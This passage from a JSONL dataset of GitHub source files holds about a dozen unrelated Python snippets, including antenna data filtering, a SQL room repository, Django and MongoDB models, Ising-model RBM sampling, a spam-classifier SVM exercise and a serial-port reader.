np.mod(theta,15) == 0\n \n self.theta = self.theta[mask1]\n self.phi = self.phi[mask1]\n self.E_phi = self.E_phi[mask1]\n self.E_the = self.E_the[mask1]\n self.Gain = self.Gain[mask1]\n \n theta = theta[mask1]\n phi = phi[mask1]\n \n mask2 = np.mod(phi,15) == 0 \n \n self.theta = self.theta[mask2]\n self.phi = self.phi[mask2]\n self.E_phi = self.E_phi[mask2]\n self.E_the = self.E_the[mask2]\n self.Gain = self.Gain[mask2]\n self.Ntheta = 25\n self.Nphi = 12\n \n def __init__(self, filename, Ntheta, Nphi):\n '''\n Constructor\n '''\n self.filename = filename\n self.Ntheta = Ntheta\n self.Nphi = Nphi\n ","repo_name":"kai-lu/Satimo-Data-Processing","sub_path":"Satimo/FileManagment.py","file_name":"FileManagment.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"18713626780","text":"import json\nimport re\nfrom to_suburb import search\n\n\ndef getp(data):\n latitude = data[\"key\"][\"coordinates\"][1]\n longitude = data[\"key\"][\"coordinates\"][0]\n tup = search(latitude, longitude)\n if tup is not None:\n data[\"postcode\"] = tup[1]\n else:\n data[\"postcode\"] = \"error\"\n return data\n\n\nwith open(\"coordinates.json\") as f1:\n fl = f1.readline()\n\nwith open(\"twt_postcode.json\",\"w\") as myfile:\n #myfile.write(\"{\\\"total_rows\\\":62002,\\\"offset\\\":0,\\\"rows\\\":[\\n\")\n myfile.write(fl) \nmydata = 
json.load(open('coordinates.json'))\ncdlist = mydata[\"rows\"]\n\nresult = map(getp, cdlist)\n\n#print (result)\nwith open(\"twt_postcode.json\",\"a\") as myfile2:\n for j in result:\n if j[\"postcode\"] != \"error\": \n myin = \"{k},\\n\".format(k=json.dumps(j))\n myfile2.write(myin)\n\nwith open(\"twt_postcode.json\",\"a\") as myfile:\n myfile.write(\"{\\\"value\\\": \\\"Puput\\\",\\\"address\\\": \\\"217-223 Grattan St, Carlton VIC 3053, Australia\\\", \\\"key\\\": {\\\"coordinates\\\": [144.9612697, -37.8001786], \\\"type\\\": \\\"Point\\\"}, \\\"postcode\\\": \\\"3053\\\", \\\"id\\\": \\\"990850686521757697\\\"}\\n]}\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"qingyangli95/guess_what","sub_path":"gcm.py","file_name":"gcm.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3026157416","text":"from minieigen import *\nfrom woo.dem import *\nimport woo.core, woo.models\nfrom math import *\nimport numpy\n\n\nclass PourFeliciter(woo.core.Preprocessor,woo.pyderived.PyWooObject):\n\t'''Showcase for custom packing predicates, and importing surfaces from STL.'''\n\t_classTraits=None\n\t_PAT=woo.pyderived.PyAttrTrait # less typing\n\t_attrTraits=[\n\t]\n\tdef __init__(self,**kw):\n\t\twoo.core.Preprocessor.__init__(self)\n\t\tself.wooPyInit(self.__class__,woo.core.Preprocessor,**kw)\n\tdef __call__(self):\n\t\t# preprocessor builds the simulation when called\n\t\tpass\n\nclass NewtonsCradle(woo.core.Preprocessor,woo.pyderived.PyWooObject):\n\t'''Showcase for custom packing predicates, and importing surfaces from STL.'''\n\t_classTraits=None\n\t_PAT=woo.pyderived.PyAttrTrait # less typing\n\t_attrTraits=[\n\t\t_PAT(int,'nSpheres',5,'Total number of spheres'),\n\t\t_PAT(int,'nFall',1,'The number of spheres which are out of the equilibrium position at the beginning.'),\n\t\t_PAT(float,'fallAngle',pi/4.,unit='deg',doc='Initial angle of falling spheres.'),\n\t\t_PAT(float,'rad',.005,unit='m',doc='Radius of spheres'),\n\t\t_PAT(Vector2,'cabHtWd',(.1,.1),unit='m',doc='Height and width of the suspension'),\n\t\t_PAT(float,'cabRad',.0005,unit='m',doc='Radius of the suspending cables'),\n\t\t_PAT(woo.models.ContactModelSelector,'model',woo.models.ContactModelSelector(name='Hertz',restitution=.99,numMat=(1,2),matDesc=['spheres','cables'],mats=[FrictMat(density=3e3,young=2e8),FrictMat(density=.001,young=2e8)]),doc='Select contact model. 
The first material is for spheres; the second, optional, material, is for the suspension cables.'),\n\t\t_PAT(Vector3,'gravity',(0,0,-9.81),'Gravity acceleration'),\n\t\t_PAT(int,'plotEvery',10,'How often to collect plot data'),\n\t\t_PAT(float,'dtSafety',.7,':obj:`woo.core.Scene.dtSafety`')\n\t]\n\tdef __init__(self,**kw):\n\t\twoo.core.Preprocessor.__init__(self)\n\t\tself.wooPyInit(self.__class__,woo.core.Preprocessor,**kw)\n\tdef __call__(self):\n\t\tpre=self\n\t\tS=woo.core.Scene(fields=[DemField(gravity=pre.gravity)],dtSafety=self.dtSafety)\n\t\tS.pre=pre.deepcopy()\n\n\t\t# preprocessor builds the simulation when called\n\t\txx=numpy.linspace(0,(pre.nSpheres-1)*2*pre.rad,num=pre.nSpheres)\n\t\tmat=pre.model.mats[0]\n\t\tcabMat=(pre.model.mats[1] if len(pre.model.mats)>1 else mat)\n\t\tht=pre.cabHtWd[0]\n\t\tfor i,x in enumerate(xx):\n\t\t\tcolor=min(.999,(x/xx[-1]))\n\t\t\ts=Sphere.make((x,0,0) if i>=pre.nFall else (x-ht*sin(pre.fallAngle),0,ht-ht*cos(pre.fallAngle)),radius=pre.rad,mat=mat,color=color)\n\t\t\tn=s.shape.nodes[0]\n\t\t\tS.dem.par.add(s)\n\t\t\t# sphere's node is integrated\n\t\t\tS.dem.nodesAppend(n)\n\t\t\tfor p in [Vector3(x,-pre.cabHtWd[1]/2,pre.cabHtWd[0]),Vector3(x,pre.cabHtWd[1]/2,pre.cabHtWd[0])]:\n\t\t\t\tt=Truss.make([n,p],radius=pre.cabRad,wire=False,color=color,mat=cabMat,fixed=None)\n\t\t\t\tt.shape.nodes[1].blocked='xyzXYZ'\n\t\t\t\tS.dem.par.add(t)\n\t\tS.engines=DemField.minimalEngines(model=pre.model,dynDtPeriod=20)+[\n\t\t\tIntraForce([In2_Truss_ElastMat()]),\n\t\t\t\twoo.core.PyRunner(self.plotEvery,'S.plot.addData(i=S.step,t=S.time,total=S.energy.total(),relErr=(S.energy.relErr() if S.step>1000 else 0),**S.energy)'),\n\t\t\t]\n\t\tS.lab.dynDt.maxRelInc=1e-6\n\t\tS.trackEnergy=True\n\t\tS.plot.plots={'i':('total','**S.energy')}\n\n\t\treturn S\n\n\n\n","repo_name":"Azeko2xo/woodem","sub_path":"py/pre/toys.py","file_name":"toys.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"17606681025","text":"from typing import Optional, List, Union\nfrom queries.pool import pool\nfrom models.models import Error, RoomIn, RoomOut\n\n\nclass RoomRepository:\n def get_all_rooms(self) -> Union[List[RoomOut], Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n ORDER BY id;\n \"\"\"\n )\n result = []\n for record in db:\n room = RoomOut(\n id=record[0],\n name=record[1],\n description=record[2],\n picture_url=record[3],\n username=record[4],\n )\n result.append(room)\n return result\n\n def get_one_room(self, room_id: int) -> Optional[RoomOut]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n WHERE id = %s;\n \"\"\",\n [room_id],\n )\n record = result.fetchone()\n if record is None:\n return None\n return self.record_to_room_out(record)\n\n def get_current_user_rooms(\n self, username: str\n ) -> Union[List[RoomOut], Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n WHERE username = %s;\n \"\"\",\n [username],\n )\n records = db.fetchall()\n if not records:\n return []\n rooms = []\n for record in records:\n rooms.append(self.record_to_room_out(record))\n return rooms\n\n def create(self, room: RoomIn) -> RoomOut:\n 
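`NewtonsCradle.__call__` above starts the first `nFall` spheres swung out by `fallAngle`, placing each at `(x − h·sin α, 0, h − h·cos α)` so the sphere stays on the circle of cable length `h` around its suspension point. A quick check of that geometry, using the preprocessor's default values:

```python
from math import sin, cos, pi

ht, alpha = 0.1, pi / 4            # cable height and initial swing (preprocessor defaults)
x0 = 0.0                           # rest position of the first sphere

swung = (x0 - ht * sin(alpha), 0.0, ht - ht * cos(alpha))

# The sphere must stay on the circle of radius ht around its pivot at (x0, 0, ht)
dist = ((swung[0] - x0) ** 2 + (swung[2] - ht) ** 2) ** 0.5
assert abs(dist - ht) < 1e-12
print(swung)
```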
with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n INSERT INTO rooms (name, description, picture_url, username)\n VALUES (%s, %s, %s, %s)\n RETURNING id;\n \"\"\",\n [\n room.name,\n room.description,\n room.picture_url,\n room.username,\n ],\n )\n id = result.fetchone()[0]\n return self.room_in_to_out(id, room)\n\n def update(self, room_id: int, room: RoomIn) -> Union[RoomOut, Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n db.execute(\n \"\"\"\n UPDATE rooms\n SET name = %s\n , description = %s\n , picture_url = %s\n WHERE id = %s;\n \"\"\",\n [room.name, room.description, room.picture_url, room_id],\n )\n return self.room_in_to_out(room_id, room)\n\n def delete(self, room_id: int) -> bool:\n with pool.connection() as conn:\n with conn.cursor() as db:\n db.execute(\n \"\"\"\n DELETE FROM rooms\n WHERE id = %s;\n \"\"\",\n [room_id],\n )\n return True\n\n def room_in_to_out(self, id: int, room: RoomIn):\n old_data = room.dict()\n return RoomOut(id=id, **old_data)\n\n def record_to_room_out(self, record):\n return RoomOut(\n id=record[0],\n name=record[1],\n description=record[2],\n picture_url=record[3],\n username=record[4],\n )\n","repo_name":"hannaerickson/ikeya","sub_path":"design_service/queries/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12880439792","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\nfrom healthApp.models.BaseModel import BaseModel\nfrom healthApp.models.Gender import Gender\n\nfrom healthApp.models.Nationality import Nationality\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n profileImage = models.TextField(null=True, blank=True)\n mobilePhone = models.CharField(max_length=20, null=True, blank=True)\n gender = models.ForeignKey(Gender, on_delete=models.CASCADE, null=True)\n birthDate = models.DateField(null=True)\n birthYear = models.IntegerField(blank=True, null=True)\n city = models.CharField(max_length=64, blank=True, null=True)\n district = models.CharField(max_length=64, blank=True, null=True)\n notification = models.BooleanField(default=True)\n nationality = models.ForeignKey(Nationality, on_delete=models.CASCADE, null=True)\n address = models.CharField(max_length=255, null=True, blank=True)\n isSendMail = models.BooleanField(default=False)","repo_name":"furkanyalcindag/comitfy-healthNetworkAppBackend","sub_path":"healthApp/models/Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26247525876","text":"import functools\n\nfrom delfin.api.validation import validators\nfrom delfin.api.schemas.storage_capabilities_schema import \\\n STORAGE_CAPABILITIES_SCHEMA\nfrom delfin import exception\n\n\ndef schema(request_body_schema):\n \"\"\"Register a schema to validate request body.\n\n Registered schema will be used for validating request body just before\n API method executing.\n\n :param dict request_body_schema: a schema to validate request body.\n\n \"\"\"\n\n def add_validator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n schema_validator = validators._SchemaValidator(request_body_schema)\n schema_validator.validate(kwargs['body'])\n return func(*args, **kwargs)\n return wrapper\n\n return add_validator\n\n\ndef 
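The `RoomRepository` above follows the classic repository pattern: pooled connections, parameterised queries, and `RETURNING id` on insert. A self-contained analogue using stdlib `sqlite3`, which uses `?` placeholders and `cursor.lastrowid` instead of `RETURNING`; the table and columns are trimmed for brevity:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE rooms (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")

def create(name, description):
    cur = conn.execute(
        "INSERT INTO rooms (name, description) VALUES (?, ?)", [name, description]
    )
    return cur.lastrowid

def get_one(room_id):
    row = conn.execute(
        "SELECT id, name, description FROM rooms WHERE id = ?", [room_id]
    ).fetchone()
    return None if row is None else {"id": row[0], "name": row[1], "description": row[2]}

rid = create("studio", "bright corner room")
print(get_one(rid))
```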
validate_capabilities(capabilities):\n if not capabilities:\n raise exception.StorageCapabilityNotSupported()\n\n schema_validator = validators._SchemaValidator(STORAGE_CAPABILITIES_SCHEMA)\n try:\n schema_validator.validate(capabilities)\n except exception.InvalidInput as ex:\n raise exception.InvalidStorageCapability(ex.msg)\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/api/validation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"43367772566","text":"import sys\nsys.path.append('../Refactor/')\nsys.path.append('../rbm-pytorch-refactor')\n\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport pandas as pd\nimport seaborn as sns\nimport torch\nimport argparse\nimport rbm_interface\nimport rbm_pytorch\nimport ising_methods_new\nfrom torch.utils.data import DataLoader\nfrom ising_methods_new import *\nimport json\nfrom scipy.stats import norm\n\nfont = {'family' : 'normal',\n 'weight' : 'light',\n 'size' : 10}\n\nmatplotlib.rc('font', **font)\n\nsns.set(style='ticks', palette='Set2')\npalette = sns.color_palette()\nsns.set_style('white')\nsns.set_style('ticks',{\"axes.linewidth\": \".5\", \"xtick.minor.size\" : \".5\", \"ytick.minor.size\" : \".5\",\"xtick.major.size\" : \"3\", \"ytick.major.size\" : \"3\"})\nsns.set_context('paper')\n\nparse = argparse.ArgumentParser(description='Process some integers.')\nparse.add_argument('--json', dest='input_json', default='params.json', help='JSON file describing the sample parameters',\n\t\t\t\t\ttype=str)\nparse.add_argument('--cuda', dest='cuda', type=bool, default=False)\n\nargs = parse.parse_args()\n\n# Enable cuda\nif args.cuda:\n\tdtype = torch.cuda.FloatTensor\nelse:\n\tdtype = torch.FloatTensor\n\n\n\nL = 8\n\nN_spins = 64\ntemperature = 2.27\n\ntry:\n\tparameters = json.load(open(args.input_json))\nexcept IOError as e:\n\tprint(\"I/O error({0}) (json): {1}\".format(e.errno, e.strerror))\n\tsys.exit(1)\nexcept:\n\tprint(\"Unexpected error:\", sys.exc_info()[0])\n\traise\n\ndtype = torch.FloatTensor\nrbm10 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm10.load_state_dict(torch.load(\"batchsizes/10/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\nrbm100 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm100.load_state_dict(torch.load(\"batchsizes/100/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\nrbm1000 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm1000.load_state_dict(torch.load(\"batchsizes/1000/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\n\nstates10 = ising_methods_new.sample_from_rbm(rbm10, parameters, dtype)\nstates100 = ising_methods_new.sample_from_rbm(rbm100, parameters, dtype)\nstates1000 = ising_methods_new.sample_from_rbm(rbm1000, parameters, dtype)\n\nspin_states10 = convert_to_spins(states10)\nspin_states100 = convert_to_spins(states100)\nspin_states1000 = convert_to_spins(states1000)\n\nmag_history10 = magnetisation(spin_states10).cpu().numpy()\nenergy_history10 = ising_energy(spin_states10, L).cpu().numpy()\nmag_history100 = magnetisation(spin_states100).cpu().numpy()\nenergy_history100 = ising_energy(spin_states100, L).cpu().numpy()\nmag_history1000 = magnetisation(spin_states1000).cpu().numpy()\nenergy_history1000 = ising_energy(spin_states1000, L).cpu().numpy()\n\nsplit_mag10 = np.reshape(mag_history10, 
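The `schema` decorator above validates `kwargs['body']` before the wrapped handler runs, delegating to delfin's `_SchemaValidator`. A minimal standalone version of the same decorator shape, with the validator swapped for a hand-rolled required-keys check — `create_storage` and its body are invented examples:

```python
import functools

def schema(required_keys):
    """Reject the call before the handler runs if the body is missing keys."""
    def add_validator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            body = kwargs["body"]
            missing = [k for k in required_keys if k not in body]
            if missing:
                raise ValueError(f"invalid body, missing: {missing}")
            return func(*args, **kwargs)
        return wrapper
    return add_validator

@schema(["name"])
def create_storage(body):
    return f"created {body['name']}"

print(create_storage(body={"name": "array-1"}))  # ok; omit "name" to get ValueError
```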
(-1,parameters['concurrent_states']))\nsplit_energy10 = np.reshape(energy_history10, (-1,parameters['concurrent_states']))\nsplit_mag100 = np.reshape(mag_history100, (-1,parameters['concurrent_states']))\nsplit_energy100 = np.reshape(energy_history100, (-1,parameters['concurrent_states']))\nsplit_mag1000 = np.reshape(mag_history1000, (-1,parameters['concurrent_states']))\nsplit_energy1000 = np.reshape(energy_history1000, (-1,parameters['concurrent_states']))\n\nsusc10 = np.var(split_mag10, axis=1)/(N_spins * temperature)\nsusc100 = np.var(split_mag100, axis=1)/(N_spins * temperature)\nsusc1000 = np.var(split_mag1000, axis=1)/(N_spins * temperature)\n\nsns.distplot(susc10, fit=norm, kde=False)\nsns.distplot(susc100, fit=norm, kde=False)\nsns.distplot(susc1000, fit=norm, kde=False)\n\nplt.show()","repo_name":"signalnoise/rbm_sampling","sub_path":"batchsizes.py","file_name":"batchsizes.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26054359600","text":"def f(s, e):\n if s < e:\n return 0\n if s == e:\n return 1\n return f(s, e + 2) * f(s, e * 3) * f(s, e * 4)\n\n\nnums = [i for i in range(100, 601) if sum(map(int, list(str(i)))) % 11 == 0]\nresult = f(1, nums[0])\nfor k in range(len(nums[1:])):\n result *= f(nums[k], nums[k + 1])\n\nprint(result)\n","repo_name":"Woolfer0097/UGE_IT","sub_path":"polyakov/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18493490517","text":"from scipy.io import loadmat\nimport numpy as np\nimport os\n\nfrom .utils import process_email, email_features, svm_train, linear_kernel, svm_predict, get_vocab_list\n\n\ndef ex6_spam():\n \"\"\"\n Exercise 6 | Spam Classification with SVMs\n\n Instructions\n ------------\n\n This file contains code that helps you get started on the\n exercise. You will need to complete the following functions:\n\n gaussian_kernel.py\n dataset3_params.py\n process_email.py\n email_features.py\n\n For this exercise, you will not need to change any code in this file,\n or any other files other than those mentioned above.\n \"\"\"\n\n \"\"\"\n ==================== Part 1: Email Preprocessing ====================\n To use an SVM to classify emails into Spam v.s. Non-Spam, you first need\n to convert each email into a vector of features. In this part, you will\n implement the preprocessing steps for each email. You should\n complete the code in processEmail.m to produce a word indices vector\n for a given email.\n \"\"\"\n\n print('\\nPreprocessing sample email (emailSample1.txt)\\n')\n\n # Extract Features\n sample1_path = os.path.dirname(os.path.realpath(__file__)) + '/data/emailSample1.txt'\n sample1_path = sample1_path.replace('\\\\', '/')\n with open(sample1_path) as fid:\n file_contents = fid.read()\n\n word_indices = process_email(file_contents)\n\n # Print stats\n print('Word Indicies: %d' % len(word_indices))\n\n input('Program paused. Press enter to continue.\\n')\n\n \"\"\"\n ==================== Part 2: Feature Extraction ====================\n Now, you will convert each email into a vector of features in R^n. 
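batchsizes.py above estimates the magnetic susceptibility per block of concurrent chains as χ = Var(M)/(N·T), then plots the distribution of those estimates. The same computation on synthetic magnetisation samples — the Gaussian fake data and chain count below are assumptions for illustration:

```python
import numpy as np

N_spins, temperature, n_chains = 64, 2.27, 30   # n_chains stands in for concurrent_states
rng = np.random.default_rng(0)
mag_history = rng.normal(0.0, 8.0, size=3000)   # synthetic magnetisation samples

blocks = mag_history.reshape(-1, n_chains)      # one row per sampling step
susc = blocks.var(axis=1) / (N_spins * temperature)
print(susc.mean(), susc.std())                  # the distribution distplot visualises
```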
\n You should complete the code in email_features.py to produce a feature\n vector for a given email.\n \"\"\"\n print('\\nExtracting features from sample email (emailSample1.txt)\\n')\n\n features = email_features(word_indices)\n\n # Print Stats\n print('\\nLength of feature vector: %d' % len(features))\n print('Number of non-zero entries: %d' % sum(features > 0))\n\n input('Program paused. Press enter to continue.\\n')\n\n \"\"\"\n =========== Part 3: Train Linear SVM for Spam Classification ========\n In this section, you will train a linear classifier to determine if an\n email is Spam or Not-Spam.\n \"\"\"\n\n # Load the Spam Email dataset\n # You will have X, y in your environment\n spam_train_path = os.path.dirname(os.path.realpath(__file__)) + '/data/spamTrain.mat'\n spam_train_path = spam_train_path.replace('\\\\', '/')\n data = loadmat(spam_train_path)\n X, y = data['X'].astype(float), data['y'][:, 0]\n\n print('Training Linear SVM (Spam Classification)')\n print('This may take 1 to 2 minutes ...\\n')\n\n C = 0.1\n model = svm_train(X, y, C, linear_kernel)\n\n # Compute the training accuracy\n p = svm_predict(model, X)\n\n print('Training Accuracy: %.2f' % (np.mean(p == y) * 100))\n\n \"\"\"\n =================== Part 4: Test Spam Classification ================\n After training the classifier, we can evaluate it on a test set. We have\n included a test set in spamTest.mat\n \"\"\"\n\n # Load the test dataset\n # You will have Xtest, ytest in your environment\n spam_test_path = os.path.dirname(os.path.realpath(__file__)) + '/data/spamTest.mat'\n spam_test_path = spam_test_path.replace('\\\\', '/')\n data = loadmat(spam_test_path)\n Xtest, ytest = data['Xtest'].astype(float), data['ytest'][:, 0]\n\n print('Evaluating the trained Linear SVM on a test set ...')\n p = svm_predict(model, Xtest)\n\n print('Test Accuracy: %.2f' % (np.mean(p == ytest) * 100))\n\n input('\\nProgram paused. Press enter to continue.\\n')\n\n \"\"\"\n ================= Part 5: Top Predictors of Spam ====================\n Since the model we are training is a linear SVM, we can inspect the\n weights learned by the model to understand better how it is determining\n whether an email is spam or not. The following code finds the words with\n the highest weights in the classifier. Informally, the classifier\n 'thinks' that these words are the most likely indicators of spam.\n \"\"\"\n\n # Sort the weights and obtain the vocabulary list\n idx = np.argsort(model['w'])\n top_idx = idx[-15:][::-1]\n vocab_list = get_vocab_list()\n\n print('Top predictors of spam:')\n print('%-15s %-15s' % ('word', 'weight'))\n print('----' + ' ' * 12 + '------')\n for word, w in zip(np.array(vocab_list)[top_idx], model['w'][top_idx]):\n print('%-15s %0.2f' % (word, w))\n\n input('\\nProgram paused. Press enter to continue.\\n')\n\n \"\"\"\n =================== Part 6: Try Your Own Emails =====================\n Now that you've trained the spam classifier, you can use it on your own\n emails! In the starter code, we have included spamSample1.txt,\n spamSample2.txt, emailSample1.txt and emailSample2.txt as examples. \n The following code reads in one of these emails and then uses your \n learned SVM classifier to determine whether the email is Spam or \n Not Spam\n \"\"\"\n\n # Set the file to be read in (change this to spamSample2.txt,\n # emailSample1.txt or emailSample2.txt to see different predictions on\n # different emails types). 
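Part 5 of the exercise ranks vocabulary words by their linear-SVM weight with `np.argsort`, slicing the largest entries and reversing for descending order. The indexing idiom in isolation — the words and weights below are made up to resemble the exercise's stemmed vocabulary:

```python
import numpy as np

vocab = np.array(["click", "remov", "guarante", "visit", "basenumb", "dollar"])
w = np.array([0.50, 0.42, 0.38, 0.37, 0.34, 0.33])   # made-up classifier weights

top_idx = np.argsort(w)[-3:][::-1]   # indices of the 3 largest weights, descending
for word, weight in zip(vocab[top_idx], w[top_idx]):
    print(f"{word:<15} {weight:0.2f}")
```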
Try your own emails as well!\n email_sample_path = os.path.dirname(os.path.realpath(__file__)) + '/data/emailSample1.txt'\n email_sample_path = email_sample_path.replace('\\\\', '/')\n\n with open(email_sample_path) as fid:\n file_contents = fid.read()\n\n word_indices = process_email(file_contents, verbose=False)\n x = email_features(word_indices)\n p = svm_predict(model, x)\n\n print('\\nProcessed %s\\nSpam Classification: %s' % (email_sample_path, 'spam' if p else 'not spam'))\n print('(1 indicates spam, 0 indicates not spam)\\n\\n')\n","repo_name":"Flibielt/mlbasics-ex6","sub_path":"ex6/src/ex6_spam.py","file_name":"ex6_spam.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7366553113","text":"#Código para ordenar os valores de uma lista sem usar o Sort\n\nnúmeros = []\n\nfor c in range(0,5):\n new = int(input('Digite um valor: '))\n if c == 0 or new > números[-1]:\n números.append((new))\n print(f'Adicionado ao final da lista! ')\n else:\n pos = 0\n while pos < len(números):\n if new <= números[pos]:\n números.insert(pos, new)\n print(f'Adicionado na posição {pos} da lista')\n break\n pos += 1\n\nprint(f'Valores adicionados: {números}')\n","repo_name":"mateuzh/Python","sub_path":"desafio080.py","file_name":"desafio080.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30575090280","text":"from Domain.OrderModels.OrderStatus import OrderStatus\nfrom Domain.OrderModels.Order import Order\nfrom Domain.BuildEnumMethods import BuildEnumMethods\nfrom PortfolioEngine.Adapters.BaseAdapter.BaseAdapter import BaseAdapter\nimport logging\nfrom PortfolioEngine.Components.Portfolio import Portfolio\nfrom mongoengine import connect as meConnect\nfrom Domain.PortfolioDocument import PortfolioDocument\n\n\nclass MongoConfig():\n DB_CONNECTION = \"test\"\n DB_CONNECTION_HOST = \"localhost\"\n DB_CONNECTION_PORT = 27017\n PROFILE = \"default\"\n\nclass MongoAdapter(BaseAdapter):\n config : MongoConfig = MongoConfig()\n currentPortfolio : Portfolio\n\n def __init__(self):\n self.initializeCurrentPortfolio()\n\n def initializeCurrentPortfolio(self):\n self.connect()\n try:\n portfolioDoc = PortfolioDocument.objects(name = self.config.PROFILE).first()\n self.currentPortfolio = Portfolio()\n self.currentPortfolio.deepCopy(portfolioDoc)\n logging.info(\"Initialized currentPortfolio via DB\")\n except:\n self.currentPortfolio = Portfolio()\n logging.info(\"Initialized currentPortfolio via manual building\")\n\n\n def savePortfolio(self):\n doc = PortfolioDocument.build(method=BuildEnumMethods.MANUAL, tickerDistr = self.currentPortfolio.tickerAmounts, name = self.config.PROFILE)\n potentialExisting = None\n try:\n potentialExisting : PortfolioDocument= PortfolioDocument.objects(name = self.config.PROFILE).first()\n except:\n logging.warn(\"No existing portfolio document found\")\n if(potentialExisting is not None):\n potentialExisting.delete()\n doc.save()\n\n\n def connect(self):\n meConnect(self.config.DB_CONNECTION, \n host=self.config.DB_CONNECTION_HOST, \n port=self.config.DB_CONNECTION_PORT)\n\n \n def getCurrentPortfolio(self) -> Portfolio:\n return self.currentPortfolio\n\n def executeTradeCallBack(self, oStatus : OrderStatus):\n c = oStatus.contract\n ticker = c.symbol\n amt = oStatus.order.total_quantity\n port = self.getCurrentPortfolio()\n port.tickerAmounts[ticker] = amt\n 
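desafio080.py above (Portuguese comments: insert each of five user inputs into its sorted position without calling `sort`) scans for the insertion index by hand. The stdlib `bisect` module performs the same search in O(log n); a sketch with the user inputs replaced by a fixed list:

```python
import bisect

numeros = []
for novo in [5, 2, 9, 2, 7]:           # stand-ins for the five user inputs
    bisect.insort(numeros, novo)       # keeps the list sorted on every insert
print(numeros)                         # [2, 2, 5, 7, 9]
```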
self.savePortfolio()","repo_name":"jminahan/backtest_framework","sub_path":"PortfolioEngine/Adapters/MongoAdapter/MongoAdapter.py","file_name":"MongoAdapter.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28073608213","text":"from slackclient import SlackClient\nimport urllib\nimport serial\nimport sys\nimport time\nimport re\nfrom collections import deque\nimport math\n\nCOM_BAUD = 9600\n\ndef main():\n\n comport = input(\"Enter COM port name: \")\n\n\n ser = serial.Serial(comport, COM_BAUD, timeout = 0, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, xonxoff=1)\n\n ser.write(bytearray(\"g 1900\\r\\n\", \"UTF8\"))\n\n curLine = \"\"\n\n gps_status = None\n\n last_rec_time = time.time() * 1000\n\n alerted = False\n landed_alerted = False\n launch_alerted = False\n\n gps_start = None\n\n last_message_check = time.time() * 1000\n MESSAGE_CHECK_ITER = 5000\n\n message = \"\"\n\n maximum_altitude = 0\n maximum_speed = 0\n\n guess = []\n\n # Loop here and read COM data\n while True:\n\n bs = ser.read().decode(\"ISO-8859-1\")\n out = str(bs)\n if not out == '':\n if out == '\\r':\n out = '\\n'\n\n curLine += out\n\n if out == '\\n':\n\n #We got a new line. Processing...\n if(curLine.lower().find(\"selected\") != -1):\n m = re.search('.?(\\d)',curLine)\n level = int(m.group(0))\n print(\"\\n\\nWe are on level {lvl}\".format(lvl=level))\n\n if(curLine.lower().find(\"Enter the Code:\") != -1):\n print(\"\\n\\nWe are entering a code now\")\n\n\n curLine = \"\"\n # ser.write();\n\n sys.stdout.write(out)\n sys.stdout.flush()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"oberhauserg/HCS12-Guess-The-Number","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86625807416","text":"#! /usr/bin/env python\n\nimport sys\nimport os\nimport json\n\nfrom multiprocess import Pool\n\nsys.path.append(os.environ['REPO_DIR'] + '/utilities')\nfrom utilities2015 import *\nfrom data_manager import *\nfrom metadata import *\nfrom distributed_utilities import *\n\nimport argparse\n\nparser = 